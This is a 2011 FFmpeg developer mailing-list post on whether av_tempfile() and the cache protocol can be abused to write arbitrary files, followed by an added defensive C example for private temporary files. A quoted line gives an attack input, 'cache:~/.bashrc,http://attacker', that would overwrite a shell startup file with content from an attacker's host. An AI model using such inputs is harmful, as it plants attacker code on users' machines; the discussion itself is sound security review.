[FFmpeg-devel] [RFC] av_tempfile()

Reimar Döffinger Reimar.Doeffinger at gmx.de
Sun Oct 16 21:30:10 CEST 2011


On Sun, Oct 16, 2011 at 09:27:12PM +0200, Reimar Döffinger wrote:
> > > "Features over security" IMO is not an acceptable behaviour, especially
> > > if it's not possible to disable it.
> > 
> > > Then force the user to specify a file name. That also works far better
> > > if you want the "download while watching" to work sanely.
> > 
> > I did that but that is exploitable
> > More precisely cache:~/.bashrc,http://attacker as clickable link
> > or something along these lines as reference within another file
> > thus as a result of this I decided to use a temporary file, which is
> > what I committed.
> 
> Whether allowing anyone to create files with arbitrary content (even if
> only in /tmp) is that great is questionable enough.

Note: if they were to somehow block /tmp it even allows creating files
with arbitrary content in the current directory.
Which is one step closer to allowing it to be executed (can't think of
a way right now, Windows likes executing stuff in "." but does not like
things without the proper extensions, Linux wants execute flag and
usually does not look in ".", but still...)
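
The concern raised in this message, as an added example that is not part of the original post and is not FFmpeg's code: a cache file created in one fixed directory with no fallback to the current directory, and unlinked immediately so the downloaded content never has a path that could be opened or executed. The helper name `open_private_cache` and the use of `/tmp` are assumptions for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (illustration only, not FFmpeg's av_tempfile()).
 * Creates an anonymous cache file inside `dir` only; returns fd or -1. */
int open_private_cache(const char *dir, const char *prefix)
{
    char path[PATH_MAX];
    struct stat st;
    int fd, n;
    /* The prefix is a plain name; reject anything that could steer the path. */
    if (!dir || !prefix || strchr(prefix, '/')) {
        errno = EINVAL;
        return -1;
    }
    n = snprintf(path, sizeof(path), "%s/%sXXXXXX", dir, prefix);
    if (n < 0 || (size_t)n >= sizeof(path)) {
        errno = ENAMETOOLONG;
        return -1;
    }
    fd = mkstemp(path);  /* exclusive create, owner-only mode, random suffix */
    if (fd < 0)
        return -1;       /* deliberately no retry in "." */

    /* Remove the name at once so the downloaded bytes are reachable only
     * through this descriptor, then confirm we hold a regular file. */
    if (unlink(path) < 0 || fstat(fd, &st) < 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    int fd = open_private_cache("/tmp", "cache");  /* "/tmp" is an assumption */
    if (fd < 0) {
        perror("open_private_cache");  /* fail closed instead of using "." */
        return 1;
    }
    printf("anonymous cache file open on fd %d\n", fd);
    return close(fd) < 0;
}
```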
